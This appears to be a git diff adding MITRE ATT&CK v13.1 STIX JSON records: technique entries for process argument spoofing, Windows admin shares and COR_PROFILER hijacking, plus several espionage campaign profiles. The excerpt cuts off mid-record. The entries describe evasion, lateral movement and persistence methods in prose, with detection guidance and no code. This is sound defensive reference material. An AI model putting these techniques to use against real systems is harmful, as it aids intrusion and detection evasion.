b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--ffe59ad3-ad9b-4b9f-b74f-5beb3c309dc1.json @@ -0,0 +1,78 @@ +{ + "type": "bundle", + "id": "bundle--f121d62d-b553-4739-a2cb-ca68e1f46611", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "attack-pattern--ffe59ad3-ad9b-4b9f-b74f-5beb3c309dc1", + "type": "attack-pattern", + "created": "2021-11-19T14:13:11.335Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1564.010", + "url": "https://attack.mitre.org/techniques/T1564/010" + }, + { + "source_name": "Microsoft PEB 2021", + "url": "https://docs.microsoft.com/en-us/windows/win32/api/winternl/ns-winternl-peb", + "description": "Microsoft. (2021, October 6). PEB structure (winternl.h). Retrieved November 19, 2021." + }, + { + "source_name": "Xpn Argue Like Cobalt 2019", + "url": "https://blog.xpnsec.com/how-to-argue-like-cobalt-strike/", + "description": "Chester, A. (2019, January 28). How to Argue like Cobalt Strike. Retrieved November 19, 2021." + }, + { + "source_name": "Cobalt Strike Arguments 2019", + "url": "https://blog.cobaltstrike.com/2019/01/02/cobalt-strike-3-13-why-do-we-argue/", + "description": "Mudge, R. (2019, January 2). https://blog.cobaltstrike.com/2019/01/02/cobalt-strike-3-13-why-do-we-argue/. Retrieved November 19, 2021." + }, + { + "source_name": "Nviso Spoof Command Line 2020", + "url": "https://blog.nviso.eu/2020/02/04/the-return-of-the-spoof-part-2-command-line-spoofing/", + "description": "Daman, R. (2020, February 4). The return of the spoof part 2: Command line spoofing. Retrieved November 19, 2021." + }, + { + "source_name": "FireEye FiveHands April 2021", + "url": "https://www.fireeye.com/blog/threat-research/2021/04/unc2447-sombrat-and-fivehands-ransomware-sophisticated-financial-threat.html", + "description": "McLellan, T. and Moore, J. et al. (2021, April 29). UNC2447 SOMBRAT and FIVEHANDS Ransomware: A Sophisticated Financial Threat. Retrieved June 2, 2021." + }, + { + "source_name": "Mandiant Endpoint Evading 2019", + "url": "https://www.mandiant.com/resources/staying-hidden-on-the-endpoint-evading-detection-with-shellcode", + "description": "Pena, E., Erikson, C. (2019, October 10). Staying Hidden on the Endpoint: Evading Detection with Shellcode. Retrieved November 29, 2021." + } + ], + "modified": "2021-11-29T15:56:50.370Z", + "name": "Process Argument Spoofing", + "description": "Adversaries may attempt to hide process command-line arguments by overwriting process memory. Process command-line arguments are stored in the process environment block (PEB), a data structure used by Windows to store various information about/used by a process. The PEB includes the process command-line arguments that are referenced when executing the process. When a process is created, defensive tools/sensors that monitor process creations may retrieve the process arguments from the PEB.(Citation: Microsoft PEB 2021)(Citation: Xpn Argue Like Cobalt 2019)\n\nAdversaries may manipulate a process PEB to evade defenses. For example, [Process Hollowing](https://attack.mitre.org/techniques/T1055/012) can be abused to spawn a process in a suspended state with benign arguments. After the process is spawned and the PEB is initialized (and process information is potentially logged by tools/sensors), adversaries may override the PEB to modify the command-line arguments (ex: using the [Native API](https://attack.mitre.org/techniques/T1106) WriteProcessMemory() function) then resume process execution with malicious arguments.(Citation: Cobalt Strike Arguments 2019)(Citation: Xpn Argue Like Cobalt 2019)(Citation: Nviso Spoof Command Line 2020)\n\nAdversaries may also execute a process with malicious command-line arguments then patch the memory with benign arguments that may bypass subsequent process memory analysis.(Citation: FireEye FiveHands April 2021)\n\nThis behavior may also be combined with other tricks (such as [Parent PID Spoofing](https://attack.mitre.org/techniques/T1134/004)) to manipulate or further evade process-based detections.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_detection": "Detection of process argument spoofing may be difficult as adversaries may momentarily modify stored arguments used for malicious execution. These changes may bypass process creation detection and/or later process memory analysis. Consider monitoring for [Process Hollowing](https://attack.mitre.org/techniques/T1055/012), which includes monitoring for process creation (especially those in a suspended state) as well as access and/or modifications of these processes (especially by the parent process) via Windows API calls.(Citation: Nviso Spoof Command Line 2020)(Citation: Mandiant Endpoint Evading 2019)\n\nAnalyze process behavior to determine if a process is performing actions it usually does not and/or do no align with its logged command-line arguments.", + "x_mitre_is_subtechnique": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_data_sources": [ + "Process: Process Creation" + ], + "x_mitre_permissions_required": [ + "User" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--ffe742ed-9100-4686-9e00-c331da544787.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--ffe742ed-9100-4686-9e00-c331da544787.json new file mode 100644 index 0000000000000000000000000000000000000000..3fa642b17090dd70a932b2a65bddcf7bab234fb9 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--ffe742ed-9100-4686-9e00-c331da544787.json @@ -0,0 +1,89 @@ +{ + "type": "bundle", + "id": "bundle--2f76d352-9abd-4edd-a57a-3065668465ac", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "attack-pattern--ffe742ed-9100-4686-9e00-c331da544787", + "type": "attack-pattern", + "created": "2017-05-31T21:31:00.200Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1077", + "url": "https://attack.mitre.org/techniques/T1077" + }, + { + "external_id": "CAPEC-561", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/561.html" + }, + { + "url": "https://en.wikipedia.org/wiki/Server_Message_Block", + "description": "Wikipedia. (2016, June 12). Server Message Block. Retrieved June 12, 2016.", + "source_name": "Wikipedia SMB" + }, + { + "url": "https://technet.microsoft.com/en-us/library/cc787851.aspx", + "description": "Microsoft. (2003, March 28). What Is RPC?. Retrieved June 12, 2016.", + "source_name": "TechNet RPC" + }, + { + "url": "http://support.microsoft.com/kb/314984", + "description": "Microsoft. (n.d.). How to create and delete hidden or administrative shares on client computers. Retrieved November 20, 2014.", + "source_name": "Microsoft Admin Shares" + }, + { + "url": "https://technet.microsoft.com/bb490717.aspx", + "description": "Microsoft. (n.d.). Net Use. Retrieved November 25, 2016.", + "source_name": "Technet Net Use" + }, + { + "url": "https://docs.microsoft.com/en-us/archive/blogs/jepayne/tracking-lateral-movement-part-one-special-groups-and-specific-service-accounts", + "description": "Payne, J. (2015, November 26). Tracking Lateral Movement Part One - Special Groups and Specific Service Accounts. Retrieved February 1, 2016.", + "source_name": "Lateral Movement Payne" + }, + { + "url": "https://docs.microsoft.com/en-us/archive/blogs/jepayne/monitoring-what-matters-windows-event-forwarding-for-everyone-even-if-you-already-have-a-siem", + "description": "Payne, J. (2015, November 23). Monitoring what matters - Windows Event Forwarding for everyone (even if you already have a SIEM.). Retrieved February 1, 2016.", + "source_name": "Windows Event Forwarding Payne" + }, + { + "source_name": "Medium Detecting Lateral Movement", + "url": "https://medium.com/threatpunter/detecting-lateral-movement-using-sysmon-and-splunk-318d3be141bc", + "description": "French, D. (2018, September 30). Detecting Lateral Movement Using Sysmon and Splunk. Retrieved October 11, 2019." + } + ], + "modified": "2020-03-23T19:54:12.651Z", + "name": "Windows Admin Shares", + "description": "Windows systems have hidden network shares that are accessible only to administrators and provide the ability for remote file copy and other administrative functions. Example network shares include C$, ADMIN$, and IPC$. \n\nAdversaries may use this technique in conjunction with administrator-level [Valid Accounts](https://attack.mitre.org/techniques/T1078) to remotely access a networked system over server message block (SMB) (Citation: Wikipedia SMB) to interact with systems using remote procedure calls (RPCs), (Citation: TechNet RPC) transfer files, and run transferred binaries through remote Execution. Example execution techniques that rely on authenticated sessions over SMB/RPC are [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), [Service Execution](https://attack.mitre.org/techniques/T1035), and [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047). Adversaries can also use NTLM hashes to access administrator shares on systems with [Pass the Hash](https://attack.mitre.org/techniques/T1075) and certain configuration and patch levels. (Citation: Microsoft Admin Shares)\n\nThe [Net](https://attack.mitre.org/software/S0039) utility can be used to connect to Windows admin shares on remote systems using net use commands with valid credentials. (Citation: Technet Net Use)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "lateral-movement" + } + ], + "x_mitre_detection": "Ensure that proper logging of accounts used to log into systems is turned on and centrally collected. Windows logging is able to collect success/failure for accounts that may be used to move laterally and can be collected using tools such as Windows Event Forwarding. (Citation: Lateral Movement Payne) (Citation: Windows Event Forwarding Payne) Monitor remote login events and associated SMB activity for file transfers and remote process execution. Monitor the actions of remote users who connect to administrative shares. Monitor for use of tools and commands to connect to remote shares, such as [Net](https://attack.mitre.org/software/S0039), on the command-line interface and Discovery techniques that could be used to find remotely accessible systems.(Citation: Medium Detecting Lateral Movement)", + "x_mitre_version": "1.1", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_permissions_required": [ + "Administrator" + ], + "x_mitre_system_requirements": [ + "File and printer sharing over SMB enabled.\nHost/network firewalls not blocking SMB ports between source and destination.\nUse of domain account in administrator group on remote system or default system admin account." + ], + "x_mitre_is_subtechnique": false + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--ffeb0780-356e-4261-b036-cfb6bd234335.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--ffeb0780-356e-4261-b036-cfb6bd234335.json new file mode 100644 index 0000000000000000000000000000000000000000..a221744a943a6643d7e3677494532b0b600bc098 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--ffeb0780-356e-4261-b036-cfb6bd234335.json @@ -0,0 +1,98 @@ +{ + "type": "bundle", + "id": "bundle--ecf60e03-838a-4b79-9f95-8d4f2e1c346a", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_contributors": [ + "Jesse Brown, Red Canary" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "attack-pattern--ffeb0780-356e-4261-b036-cfb6bd234335", + "type": "attack-pattern", + "created": "2020-06-24T22:30:55.843Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1574.012", + "url": "https://attack.mitre.org/techniques/T1574/012" + }, + { + "source_name": "Microsoft Profiling Mar 2017", + "url": "https://docs.microsoft.com/en-us/dotnet/framework/unmanaged-api/profiling/profiling-overview", + "description": "Microsoft. (2017, March 30). Profiling Overview. Retrieved June 24, 2020." + }, + { + "source_name": "Microsoft COR_PROFILER Feb 2013", + "url": "https://docs.microsoft.com/en-us/previous-versions/dotnet/netframework-4.0/ee471451(v=vs.100)", + "description": "Microsoft. (2013, February 4). Registry-Free Profiler Startup and Attach. Retrieved June 24, 2020." + }, + { + "source_name": "RedCanary Mockingbird May 2020", + "url": "https://redcanary.com/blog/blue-mockingbird-cryptominer/", + "description": "Lambert, T. (2020, May 7). Introducing Blue Mockingbird. Retrieved May 26, 2020." + }, + { + "source_name": "Red Canary COR_PROFILER May 2020", + "url": "https://redcanary.com/blog/cor_profiler-for-persistence/", + "description": "Brown, J. (2020, May 7). Detecting COR_PROFILER manipulation for persistence. Retrieved June 24, 2020." + }, + { + "source_name": "Almond COR_PROFILER Apr 2019", + "url": "https://offsec.almond.consulting/UAC-bypass-dotnet.html", + "description": "Almond. (2019, April 30). UAC bypass via elevated .NET applications. Retrieved June 24, 2020." + }, + { + "source_name": "GitHub OmerYa Invisi-Shell", + "url": "https://github.com/OmerYa/Invisi-Shell", + "description": "Yair, O. (2019, August 19). Invisi-Shell. Retrieved June 24, 2020." + }, + { + "source_name": "subTee .NET Profilers May 2017", + "url": "https://web.archive.org/web/20170720041203/http://subt0x10.blogspot.com/2017/05/subvert-clr-process-listing-with-net.html", + "description": "Smith, C. (2017, May 18). Subvert CLR Process Listing With .NET Profilers. Retrieved June 24, 2020." + } + ], + "modified": "2021-08-30T21:35:12.049Z", + "name": "COR_PROFILER", + "description": "Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR. The COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR). These profilers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR.(Citation: Microsoft Profiling Mar 2017)(Citation: Microsoft COR_PROFILER Feb 2013)\n\nThe COR_PROFILER environment variable can be set at various scopes (system, user, or process) resulting in different levels of influence. System and user-wide environment variable scopes are specified in the Registry, where a [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM) object can be registered as a profiler DLL. A process scope COR_PROFILER can also be created in-memory without modifying the Registry. Starting with .NET Framework 4, the profiling DLL does not need to be registered as long as the location of the DLL is specified in the COR_PROFILER_PATH environment variable.(Citation: Microsoft COR_PROFILER Feb 2013)\n\nAdversaries may abuse COR_PROFILER to establish persistence that executes a malicious DLL in the context of all .NET processes every time the CLR is invoked. The COR_PROFILER can also be used to elevate privileges (ex: [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002)) if the victim .NET process executes at a higher permission level, as well as to hook and [Impair Defenses](https://attack.mitre.org/techniques/T1562) provided by .NET processes.(Citation: RedCanary Mockingbird May 2020)(Citation: Red Canary COR_PROFILER May 2020)(Citation: Almond COR_PROFILER Apr 2019)(Citation: GitHub OmerYa Invisi-Shell)(Citation: subTee .NET Profilers May 2017)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_detection": "For detecting system and user scope abuse of the COR_PROFILER, monitor the Registry for changes to COR_ENABLE_PROFILING, COR_PROFILER, and COR_PROFILER_PATH that correspond to system and user environment variables that do not correlate to known developer tools. Extra scrutiny should be placed on suspicious modification of these Registry keys by command line tools like wmic.exe, setx.exe, and [Reg](https://attack.mitre.org/software/S0075), monitoring for command-line arguments indicating a change to COR_PROFILER variables may aid in detection. For system, user, and process scope abuse of the COR_PROFILER, monitor for new suspicious unmanaged profiling DLLs loading into .NET processes shortly after the CLR causing abnormal process behavior.(Citation: Red Canary COR_PROFILER May 2020) Consider monitoring for DLL files that are associated with COR_PROFILER environment variables.", + "x_mitre_is_subtechnique": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_data_sources": [ + "Module: Module Load", + "Command: Command Execution", + "Process: Process Creation", + "Windows Registry: Windows Registry Key Modification" + ], + "x_mitre_permissions_required": [ + "User", + "Administrator" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/campaign/campaign--0257b35b-93ef-4a70-80dd-ad5258e6045b.json b/cti-ATT-CK-v13.1/enterprise-attack/campaign/campaign--0257b35b-93ef-4a70-80dd-ad5258e6045b.json new file mode 100644 index 0000000000000000000000000000000000000000..7ba70e08f2483b8fb817893446ec273843653325 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/campaign/campaign--0257b35b-93ef-4a70-80dd-ad5258e6045b.json @@ -0,0 +1,76 @@ +{ + "type": "bundle", + "id": "bundle--13c27197-2215-4076-af13-ef7ee3967b6e", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-04-10T19:18:19.033Z", + "name": "Operation Dream Job", + "description": "[Operation Dream Job](https://attack.mitre.org/campaigns/C0022) was a cyber espionage operation likely conducted by [Lazarus Group](https://attack.mitre.org/groups/G0032) that targeted the defense, aerospace, government, and other sectors in the United States, Israel, Australia, Russia, and India. In at least one case, the cyber actors tried to monetize their network access to conduct a business email compromise (BEC) operation. In 2020, security researchers noted overlapping TTPs, to include fake job lures and code similarities, between [Operation Dream Job](https://attack.mitre.org/campaigns/C0022), Operation North Star, and Operation Interception; by 2022 security researchers described [Operation Dream Job](https://attack.mitre.org/campaigns/C0022) as an umbrella term covering both Operation Interception and Operation North Star.(Citation: ClearSky Lazarus Aug 2020)(Citation: McAfee Lazarus Jul 2020)(Citation: ESET Lazarus Jun 2020)(Citation: The Hacker News Lazarus Aug 2022)", + "aliases": [ + "Operation Dream Job", + "Operation North Star", + "Operation Interception" + ], + "first_seen": "2019-09-01T04:00:00.000Z", + "last_seen": "2020-08-01T04:00:00.000Z", + "x_mitre_first_seen_citation": "(Citation: ESET Lazarus Jun 2020)", + "x_mitre_last_seen_citation": "(Citation: ClearSky Lazarus Aug 2020)", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "type": "campaign", + "id": "campaign--0257b35b-93ef-4a70-80dd-ad5258e6045b", + "created": "2023-03-17T13:37:42.596Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/campaigns/C0022", + "external_id": "C0022" + }, + { + "source_name": "Operation Interception", + "description": "(Citation: ESET Lazarus Jun 2020)" + }, + { + "source_name": "Operation North Star", + "description": "(Citation: McAfee Lazarus Jul 2020)(Citation: McAfee Lazarus Nov 2020)" + }, + { + "source_name": "McAfee Lazarus Nov 2020", + "description": "Beek, C. (2020, November 5). Operation North Star: Behind The Scenes. Retrieved December 20, 2021.", + "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/operation-north-star-behind-the-scenes/" + }, + { + "source_name": "ESET Lazarus Jun 2020", + "description": "Breitenbacher, D and Osis, K. (2020, June 17). OPERATION IN(TER)CEPTION: Targeted Attacks Against European Aerospace and Military Companies. Retrieved December 20, 2021.", + "url": "https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_Operation_Interception.pdf" + }, + { + "source_name": "McAfee Lazarus Jul 2020", + "description": "Cashman, M. (2020, July 29). Operation North Star Campaign. Retrieved December 20, 2021.", + "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/operation-north-star-a-job-offer-thats-too-good-to-be-true/?hilite=%27Operation%27%2C%27North%27%2C%27Star%27" + }, + { + "source_name": "ClearSky Lazarus Aug 2020", + "description": "ClearSky Research Team. (2020, August 13). Operation 'Dream Job' Widespread North Korean Espionage Campaign. Retrieved December 20, 2021.", + "url": "https://www.clearskysec.com/wp-content/uploads/2020/08/Dream-Job-Campaign.pdf" + }, + { + "source_name": "The Hacker News Lazarus Aug 2022", + "description": "Lakshmanan, R. (2022, August 17). North Korea Hackers Spotted Targeting Job Seekers with macOS Malware. Retrieved April 10, 2023.", + "url": "https://thehackernews.com/2022/08/north-korea-hackers-spotted-targeting.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "enterprise-attack" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/campaign/campaign--26d9ebae-de59-427f-ae9a-349456bae4b1.json b/cti-ATT-CK-v13.1/enterprise-attack/campaign/campaign--26d9ebae-de59-427f-ae9a-349456bae4b1.json new file mode 100644 index 0000000000000000000000000000000000000000..d5aa480001bc0de4bd803e8ad9dab3575bd9b46f --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/campaign/campaign--26d9ebae-de59-427f-ae9a-349456bae4b1.json @@ -0,0 +1,46 @@ +{ + "type": "bundle", + "id": "bundle--b8e6c25f-7402-46d2-953c-14c4c2231915", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-22T03:55:03.775Z", + "name": "Frankenstein", + "description": "[Frankenstein](https://attack.mitre.org/campaigns/C0001) was described by security researchers as a highly-targeted campaign conducted by moderately sophisticated and highly resourceful threat actors in early 2019. The unidentified actors primarily relied on open source tools, including [Empire](https://attack.mitre.org/software/S0363). The campaign name refers to the actors' ability to piece together several unrelated open-source tool components.(Citation: Talos Frankenstein June 2019)", + "aliases": [ + "Frankenstein" + ], + "first_seen": "2019-01-01T06:00:00.000Z", + "last_seen": "2019-04-01T05:00:00.000Z", + "x_mitre_first_seen_citation": "(Citation: Talos Frankenstein June 2019)", + "x_mitre_last_seen_citation": "(Citation: Talos Frankenstein June 2019)", + "x_mitre_deprecated": false, + "x_mitre_version": "1.1", + "type": "campaign", + "id": "campaign--26d9ebae-de59-427f-ae9a-349456bae4b1", + "created": "2022-09-07T13:40:09.750Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/campaigns/C0001", + "external_id": "C0001" + }, + { + "source_name": "Talos Frankenstein June 2019", + "description": "Adamitis, D. et al. (2019, June 4). It's alive: Threat actors cobble together open-source pieces into monstrous Frankenstein campaign. Retrieved May 11, 2020.", + "url": "https://blog.talosintelligence.com/2019/06/frankenstein-campaign.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "enterprise-attack" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/campaign/campaign--37764c78-2a99-46d1-a7ea-6454b9bf93a0.json b/cti-ATT-CK-v13.1/enterprise-attack/campaign/campaign--37764c78-2a99-46d1-a7ea-6454b9bf93a0.json new file mode 100644 index 0000000000000000000000000000000000000000..c5b9520b075212f902bc1d9f4881e4eb745d552e --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/campaign/campaign--37764c78-2a99-46d1-a7ea-6454b9bf93a0.json @@ -0,0 +1,56 @@ +{ + "type": "bundle", + "id": "bundle--059f1f97-6910-48cc-ac18-632472677500", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-13T17:10:55.334Z", + "name": "Operation Sharpshooter", + "description": "[Operation Sharpshooter](https://attack.mitre.org/campaigns/C0013) was a global cyber espionage campaign that targeted nuclear, defense, government, energy, and financial companies, with many located in Germany, Turkey, the United Kingdom, and the United States. Security researchers noted the campaign shared many similarities with previous [Lazarus Group](https://attack.mitre.org/groups/G0032) operations, including fake job recruitment lures and shared malware code.(Citation: McAfee Sharpshooter December 2018)(Citation: Bleeping Computer Op Sharpshooter March 2019)(Citation: Threatpost New Op Sharpshooter Data March 2019) ", + "aliases": [ + "Operation Sharpshooter" + ], + "first_seen": "2017-09-01T05:00:00.000Z", + "last_seen": "2019-03-01T06:00:00.000Z", + "x_mitre_first_seen_citation": "(Citation: Threatpost New Op Sharpshooter Data March 2019)", + "x_mitre_last_seen_citation": "(Citation: Threatpost New Op Sharpshooter Data March 2019)", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "type": "campaign", + "id": "campaign--37764c78-2a99-46d1-a7ea-6454b9bf93a0", + "created": "2022-09-26T21:18:34.075Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/campaigns/C0013", + "external_id": "C0013" + }, + { + "source_name": "Bleeping Computer Op Sharpshooter March 2019", + "description": "I. Ilascu. (2019, March 3). Op 'Sharpshooter' Connected to North Korea's Lazarus Group. Retrieved September 26, 2022.", + "url": "https://www.bleepingcomputer.com/news/security/op-sharpshooter-connected-to-north-koreas-lazarus-group/" + }, + { + "source_name": "Threatpost New Op Sharpshooter Data March 2019", + "description": "L. O'Donnell. (2019, March 3). RSAC 2019: New Operation Sharpshooter Data Reveals Higher Complexity, Scope. Retrieved September 26, 2022.", + "url": "https://threatpost.com/sharpshooter-complexity-scope/142359/" + }, + { + "source_name": "McAfee Sharpshooter December 2018", + "description": "Sherstobitoff, R., Malhotra, A., et. al.. (2018, December 18). Operation Sharpshooter Campaign Targets Global Defense, Critical Infrastructure. Retrieved May 14, 2020.", + "url": "https://www.mcafee.com/enterprise/en-us/assets/reports/rp-operation-sharpshooter.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.0.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "enterprise-attack" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/campaign/campaign--4553292d-12c6-4a93-934d-12160370d4e0.json b/cti-ATT-CK-v13.1/enterprise-attack/campaign/campaign--4553292d-12c6-4a93-934d-12160370d4e0.json new file mode 100644 index 0000000000000000000000000000000000000000..1a9d8f519a5806d5e94ef3481691e348a3a8c693 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/campaign/campaign--4553292d-12c6-4a93-934d-12160370d4e0.json @@ -0,0 +1,46 @@ +{ + "type": "bundle", + "id": "bundle--b4105644-3f00-401a-9fde-49b261d43c99", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-13T17:57:06.034Z", + "name": "Operation Honeybee", + "description": "[Operation Honeybee](https://attack.mitre.org/campaigns/C0006) was a campaign that targeted humanitarian aid and inter-Korean affairs organizations from at least late 2017 through early 2018. [Operation Honeybee](https://attack.mitre.org/campaigns/C0006) initially targeted South Korea, but expanded to include Vietnam, Singapore, Japan, Indonesia, Argentina, and Canada. Security researchers assessed the threat actors were likely Korean speakers based on metadata used in both lure documents and executables, and named the campaign \"Honeybee\" after the author name discovered in malicious Word documents.(Citation: McAfee Honeybee) ", + "aliases": [ + "Operation Honeybee" + ], + "first_seen": "2017-08-01T05:00:00.000Z", + "last_seen": "2018-02-01T06:00:00.000Z", + "x_mitre_first_seen_citation": "(Citation: McAfee Honeybee)", + "x_mitre_last_seen_citation": "(Citation: McAfee Honeybee)", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "type": "campaign", + "id": "campaign--4553292d-12c6-4a93-934d-12160370d4e0", + "created": "2022-09-16T21:08:54.358Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/campaigns/C0006", + "external_id": "C0006" + }, + { + "source_name": "McAfee Honeybee", + "description": "Sherstobitoff, R. (2018, March 02). McAfee Uncovers Operation Honeybee, a Malicious Document Campaign Targeting Humanitarian Aid Groups. Retrieved May 16, 2018.", + "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.0.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "enterprise-attack" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/campaign/campaign--4603cf2f-06d0-4970-9c5d-5071b08c817f.json b/cti-ATT-CK-v13.1/enterprise-attack/campaign/campaign--4603cf2f-06d0-4970-9c5d-5071b08c817f.json new file mode 100644 index 0000000000000000000000000000000000000000..ff79ef13d6c4e4a400821ae469bb49c16b3d1deb --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/campaign/campaign--4603cf2f-06d0-4970-9c5d-5071b08c817f.json @@ -0,0 +1,47 @@ +{ + "type": "bundle", + "id": "bundle--8af8cf8e-c819-4231-939e-b1436a31ebd6", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-09-30T21:05:22.490Z", + "name": "Operation Dust Storm", + "description": "[Operation Dust Storm](https://attack.mitre.org/campaigns/C0016) was a long-standing persistent cyber espionage campaign that targeted multiple industries in Japan, South Korea, the United States, Europe, and several Southeast Asian countries. By 2015, the [Operation Dust Storm](https://attack.mitre.org/campaigns/C0016) threat actors shifted from government and defense-related intelligence targets to Japanese companies or Japanese subdivisions of larger foreign organizations supporting Japan's critical infrastructure, including electricity generation, oil and natural gas, finance, transportation, and construction.(Citation: Cylance Dust Storm)\n\n[Operation Dust Storm](https://attack.mitre.org/campaigns/C0016) threat actors also began to use Android backdoors in their operations by 2015, with all identified victims at the time residing in Japan or South Korea.(Citation: Cylance Dust Storm)", + "aliases": [ + "Operation Dust Storm" + ], + "first_seen": "2010-01-01T07:00:00.000Z", + "last_seen": "2016-02-01T06:00:00.000Z", + "x_mitre_first_seen_citation": "(Citation: Cylance Dust Storm)", + "x_mitre_last_seen_citation": "(Citation: Cylance Dust Storm)", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "type": "campaign", + "id": "campaign--4603cf2f-06d0-4970-9c5d-5071b08c817f", + "created": "2022-09-29T20:00:38.136Z", + "created_by_ref": 